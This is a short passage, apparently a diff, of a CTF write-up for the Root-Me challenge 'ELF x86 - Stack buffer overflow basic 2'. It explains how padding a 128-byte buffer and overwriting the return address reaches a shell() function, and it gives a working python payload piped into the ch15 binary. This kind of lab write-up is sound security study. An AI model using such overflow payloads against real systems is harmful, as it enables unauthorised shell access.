khangtictoc/CTF-Writeup-Practice/Pwn/Rootme/App - System/ELF x86 - Stack buffer overflow basic 2.md

 Hey dude !
 Waaaaazzaaaaaaaa ?!
 Segmentation fault
 ```
 "Segmentation fault" cuz we're executing onto a sensitive part of stack, don't mind that.
-Clearly, we can access to the satisfied function and carry out the code
+Clearly, we can access to the satisfying function and carry out the code
 ### Solution:
 - First we will fill the **buf**'s value with 128 "A" characters, and then push the address of the **shell()** function. <br>
 Payload: `(python -c "print('a'*128+'\x16\x85\x04\x08')";cat) | ./ch15` <br>